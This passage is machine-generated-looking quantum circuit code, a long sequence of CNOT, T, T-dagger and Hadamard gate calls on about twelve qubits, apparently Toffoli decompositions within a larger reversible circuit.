k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[9])
k.gate('cnot',[10,0])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[9])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('cnot',[10,0])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[2])
k.gate('cnot',[6,5])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[2])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('cnot',[6,5])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[9])
k.gate('cnot',[10,0])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[9])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('cnot',[10,0])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[2])
k.gate('cnot',[6,5])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[2])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('cnot',[6,5])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[9])
k.gate('cnot',[10,0])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[9])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('cnot',[10,0])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[2])
k.gate('cnot',[6,5])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[2])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('cnot',[6,5])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[9])
k.gate('cnot',[10,0])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[9])
k.gate('cnot',[9,10])
k.gate('cnot',[0,9])
k.gate('cnot',[10,0])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[2])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[2])
k.gate('cnot',[6,5])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[2])
k.gate('cnot',[2,6])
k.gate('cnot',[5,2])
k.gate('cnot',[6,5])
k.gate('h',[2])
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[4])
k.gate('t',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('tdag',[3])
k.gate('cnot',[8,3])
k.gate('tdag',[8])
k.gate('tdag',[3])
k.gate('t',[4])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('h',[4])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('t',[10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('tdag',[4])
k.gate('cnot',[11,4])
k.gate('tdag',[11])
k.gate('tdag',[4])
k.gate('t',[10])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('h',[10])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[8])
k.gate('cnot',[10,0])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[8])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('cnot',[10,0])
k.gate('h',[8])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[4])
k.gate('cnot',[6,5])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[4])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('cnot',[6,5])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[10])
k.gate('t',[8])
k.gate('cnot',[10,0])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('tdag',[10])
k.gate('cnot',[0,10])
k.gate('tdag',[0])
k.gate('tdag',[10])
k.gate('t',[8])
k.gate('cnot',[8,10])
k.gate('cnot',[0,8])
k.gate('cnot',[10,0])
k.gate('h',[8])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[4])
k.gate('t',[5])
k.gate('t',[6])
k.gate('t',[4])
k.gate('cnot',[6,5])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('tdag',[6])
k.gate('cnot',[5,6])
k.gate('tdag',[5])
k.gate('tdag',[6])
k.gate('t',[4])
k.gate('cnot',[4,6])
k.gate('cnot',[5,4])
k.gate('cnot',[6,5])
k.gate('h',[4])
k.gate('h',[9])
k.gate('t',[7])
k.gate('t',[4])
k.gate('t',[9])
k.gate('cnot',[4,7])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('tdag',[4])
k.gate('cnot',[7,4])
k.gate('tdag',[7])
k.gate('tdag',[4])
k.gate('t',[9])
k.gate('cnot',[9,4])
k.gate('cnot',[7,9])
k.gate('cnot',[4,7])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[11])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,11])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('tdag',[9])
k.gate('cnot',[11,9])
k.gate('tdag',[11])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[11,10])
k.gate('cnot',[9,11])
k.gate('h',[10])
k.gate('h',[0])
k.gate('t',[4])
k.gate('t',[11])
k.gate('t',[0])
k.gate('cnot',[11,4])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('tdag',[11])
k.gate('cnot',[4,11])
k.gate('tdag',[4])
k.gate('tdag',[11])
k.gate('t',[0])
k.gate('cnot',[0,11])
k.gate('cnot',[4,0])
k.gate('cnot',[11,4])
k.gate('h',[0])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('cnot',[10,3])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[10])
k.gate('cnot',[2,1])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[10])
k.gate('cnot',[10,2])
k.gate('cnot',[1,10])
k.gate('cnot',[2,1])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,3])
k.gate('cnot',[11,10])
k.gate('cnot',[3,11])
k.gate('tdag',[10])
k.gate('cnot',[3,10])
k.gate('tdag',[3])
k.gate('tdag',[10])
k.gate('t',[11])
